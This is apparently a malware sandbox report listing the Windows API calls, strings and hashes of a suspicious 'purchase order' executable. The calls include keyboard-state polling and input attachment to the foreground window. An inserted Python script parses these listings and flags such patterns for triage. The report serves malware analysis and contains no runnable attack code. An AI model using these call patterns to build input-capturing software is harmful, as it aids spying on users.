                                                            • Opcode Fuzzy Hash: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
                                                            • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 0044480E
                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                            • GetKeyState.USER32(000000A0), ref: 004448AA
                                                            • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                            • GetKeyState.USER32(000000A1), ref: 004448D9
                                                            • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                            • GetKeyState.USER32(00000011), ref: 00444903
                                                            • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                            • GetKeyState.USER32(00000012), ref: 0044492D
                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                            • GetKeyState.USER32(0000005B), ref: 00444958
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                            • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                            • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                            • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                            • String ID:
                                                            • API String ID: 3413494760-0
                                                            • Opcode ID: 8449772dd4c4864e53668d518338167b5f7124ec3e85df06159a96bd08f47b13
                                                            • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                            • Opcode Fuzzy Hash: 8449772dd4c4864e53668d518338167b5f7124ec3e85df06159a96bd08f47b13
                                                            • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: AddressProc_free_malloc$_strcat_strlen
                                                            • String ID: AU3_FreeVar
                                                            • API String ID: 2634073740-771828931
                                                            • Opcode ID: 02bdb148293147b792730c67b1546b00a60a675fa046de8965836ce0cfc2e6fd
                                                            • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                            • Opcode Fuzzy Hash: 02bdb148293147b792730c67b1546b00a60a675fa046de8965836ce0cfc2e6fd
                                                            • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                            APIs
                                                            • CoInitialize.OLE32 ref: 0046C63A
                                                            • CoUninitialize.OLE32 ref: 0046C645
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                              • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                              • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                            • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                            • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                            • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                            • IIDFromString.OLE32(?,?), ref: 0046C705
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                            • API String ID: 2294789929-1287834457
                                                            • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                            • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                            • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                            • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                            APIs
                                                              • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                              • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                              • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                              • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                            • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                            • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                            • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                            • ReleaseCapture.USER32 ref: 0047116F
                                                            • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                            • API String ID: 2483343779-2107944366
                                                            • Opcode ID: 37b0ef4ead8948c8a0d7f11259567122c9bd2b7a701ccd80914a9ed7fb95c3bd
                                                            • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                            • Opcode Fuzzy Hash: 37b0ef4ead8948c8a0d7f11259567122c9bd2b7a701ccd80914a9ed7fb95c3bd
                                                            • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                            • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                            • _wcslen.LIBCMT ref: 00450720
                                                            • _wcscat.LIBCMT ref: 00450733
                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                            • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window_wcscat_wcslen
                                                            • String ID: -----$SysListView32
                                                            • API String ID: 4008455318-3975388722
                                                            • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                            • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                            • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                            • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                            APIs
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                            • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                            • GetParent.USER32 ref: 00469C98
                                                            • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                            • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                            • GetParent.USER32 ref: 00469CBC
                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 2360848162-1403004172
                                                            • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                            • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                            • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                            • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                            • String ID:
                                                            • API String ID: 262282135-0
                                                            • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                            • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                            • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                            • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                            APIs
                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                            • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                            • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                            • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                            • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$LongWindow
                                                            • String ID:
                                                            • API String ID: 312131281-0
                                                            • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                            • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                            • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                            • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                            APIs
                                                              • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                            • SendMessageW.USER32(75A923D0,00001001,00000000,?), ref: 00448E16
                                                            • SendMessageW.USER32(75A923D0,00001026,00000000,?), ref: 00448E25
                                                              • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                            • String ID:
                                                            • API String ID: 3771399671-0
                                                            • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                            • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                            • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                            • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                            • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                            • String ID:
                                                            • API String ID: 2156557900-0
                                                            • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                            • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                            • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                            • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
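Every function entry in this part of the report is a machine-generated list of resolved imports and call sites. What a reviewer usually wants is to pull those lines out of the report, turn the numeric window-message constants back into names, and spot call patterns that deserve a closer look, such as the GetForegroundWindow / AttachThreadInput sequence in the entry above. The following Python is an added example, not Joe Sandbox code and not code from the sample: it parses the "APIs" line format used in these entries, names the uMsg argument of SendMessageW calls from a small table of user32/comctl32 constants, and applies a simple heuristic to the AttachThreadInput pattern. CONSTRUCTED_LISTING is assembled from lines of this report (the SysListView32 function and the AttachThreadInput function), with one "Part of subcall" line moved in from the drag-and-drop handler so that every line shape the plugin emits is exercised; the MSG_NAMES table, the function names and the heuristic are mine.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed from lines of this report; two "APIs" groups are merged and one
# "Part of subcall" line is borrowed from another function to cover all shapes.
CONSTRUCTED_LISTING = """\
APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
• _wcslen.LIBCMT ref: 00450720
• SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
APIs
  • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
• GetCurrentThreadId.KERNEL32 ref: 00434643
• GetForegroundWindow.USER32(00000000), ref: 00434655
• GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
• AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
"""

# One "APIs" line: optional subcall prefix, Api.MODULE, optional (args), ref: addr
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# Window-message values seen in this report (my table; user32/commctrl constants).
MSG_NAMES = {
    0x00B1: "EM_SETSEL",
    0x0111: "WM_COMMAND",
    0x018C: "LB_SELECTSTRING",
    0x0205: "WM_RBUTTONUP",
    0x1001: "LVM_SETBKCOLOR",
    0x1004: "LVM_GETITEMCOUNT",
    0x1008: "LVM_DELETEITEM",
    0x101D: "LVM_GETCOLUMNWIDTH",
    0x101E: "LVM_SETCOLUMNWIDTH",
    0x101F: "LVM_GETHEADER",
    0x1026: "LVM_SETTEXTBKCOLOR",
    0x1036: "LVM_SETEXTENDEDLISTVIEWSTYLE",
    0x104D: "LVM_INSERTITEMW",
    0x1057: "LVM_GETSTRINGWIDTHW",
    0x1061: "LVM_INSERTCOLUMNW",
    0x1074: "LVM_SETITEMTEXTW",
}


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple             # int where the plugin resolved a constant, None for '?'
    ref: int                # call-site address
    subcall: Optional[int]  # callee address when reported as part of a subcall


def _arg(tok: str):
    tok = tok.strip()
    return None if tok == "?" else int(tok, 16)


def parse_listing(text: str) -> list:
    """Return the ApiCall records of every API line; headers such as 'APIs' are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m["args"]
        args = tuple(_arg(t) for t in raw.split(",")) if raw else ()
        calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16),
                             int(m["sub"], 16) if m["sub"] else None))
    return calls


def decode_message(call: ApiCall) -> Optional[str]:
    """Name the uMsg argument of a SendMessageW call; hex string if not in the table."""
    if call.api != "SendMessageW" or len(call.args) < 2 or call.args[1] is None:
        return None
    return MSG_NAMES.get(call.args[1], "0x%04X" % call.args[1])


def triage_input_attach(calls) -> list:
    """Heuristic for GetForegroundWindow + AttachThreadInput in one function.

    AttachThreadInput(idAttach, idAttachTo, TRUE) shares input state with the
    foreground thread; a balanced TRUE/FALSE pair is the expected shape, and a
    GetAsyncKeyState poll in the same function is worth a closer look.
    """
    apis = {c.api for c in calls}
    attach = [c for c in calls if c.api == "AttachThreadInput"]
    findings = []
    if attach and "GetForegroundWindow" in apis:
        findings.append("attaches to foreground window's input thread")
    n_on = sum(1 for c in attach if c.args[-1:] == (1,))
    n_off = sum(1 for c in attach if c.args[-1:] == (0,))
    if n_on != n_off:
        findings.append(f"unbalanced AttachThreadInput: {n_on} attach, {n_off} detach")
    if "GetAsyncKeyState" in apis:
        findings.append("polls key state with GetAsyncKeyState")
    return findings


if __name__ == "__main__":
    parsed = parse_listing(CONSTRUCTED_LISTING)
    for c in parsed:
        name = decode_message(c)
        print(f"{c.ref:08X} {c.module}!{c.api}" + (f"  uMsg={name}" if name else ""))
    print(triage_input_attach(parsed))
```

Feed the script the "APIs" lines of any entry (the whole report section works too, since non-matching lines are ignored) and extend MSG_NAMES as further message values turn up; the "?" placeholders the plugin emits for arguments it could not resolve are kept as None so they never masquerade as a real constant.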
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                            • API String ID: 0-1603158881
                                                            • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                            • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
